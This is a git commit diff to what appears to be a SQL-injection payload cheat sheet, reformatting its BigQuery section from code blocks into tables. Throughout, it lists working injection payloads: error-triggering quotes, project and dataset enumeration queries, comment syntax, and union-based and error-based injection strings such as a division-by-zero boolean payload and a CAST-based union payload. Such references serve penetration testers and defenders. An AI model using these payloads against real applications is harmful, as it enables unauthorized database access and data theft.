SQL Injections - Updates for MSSQL, Oracle, PostgreSQL

2025-12-30 06:30:27 -08:00 · 2024-11-15 23:56:04 +01:00
parent f57d0813ca
commit 67af38aa4e
6 changed files with 256 additions and 248 deletions
--- a/Injection/BigQuery
+++ b/Injection/BigQuery
@@ -18,23 +18,20 @@
 * Use a classic single quote to trigger an error: `'`
 * Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```

-```ps1
-# Gathering project id
-select @@project_id
+| SQL Query                                             | Description |
+| ----------------------------------------------------- | -------------------- |
+| `SELECT @@project_id`                                 | Gathering project id |
+| `SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA` | Gathering all dataset names |
+| `select * from project_id.dataset_name.table_name`    | Gathering data from specific project id & dataset |

-# Gathering all dataset names
-select schema_name from INFORMATION_SCHEMA.SCHEMATA
-
-# Gathering data from specific project id & dataset
-select * from `project_id.dataset_name.table_name`
-```

 ## BigQuery Comment

-```ps1
-select 1#from here it is not working
-select 1/*between those it is not working*/
-```
+| Type                       | Description                       |
+|----------------------------|-----------------------------------|
+| `#`                        | Hash comment                      |
+| `/* PostgreSQL Comment */` | C-style comment                   |
+

 ## BigQuery Union Based

@@ -47,13 +44,11 @@ true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,

 ## BigQuery Error Based

-```ps1
-# Error based - division by zero
-' OR if(1/(length((select('a')))-1)=1,true,false) OR '
+| SQL Query                                                | Description          |
+| -------------------------------------------------------- | -------------------- |
+| `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` | Division by zero     |
+| `select CAST(@@project_id AS INT64)`                     | Casting              |

-# Error based - casting: select CAST(@@project_id AS INT64)
-dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#
-```

 ## BigQuery Boolean Based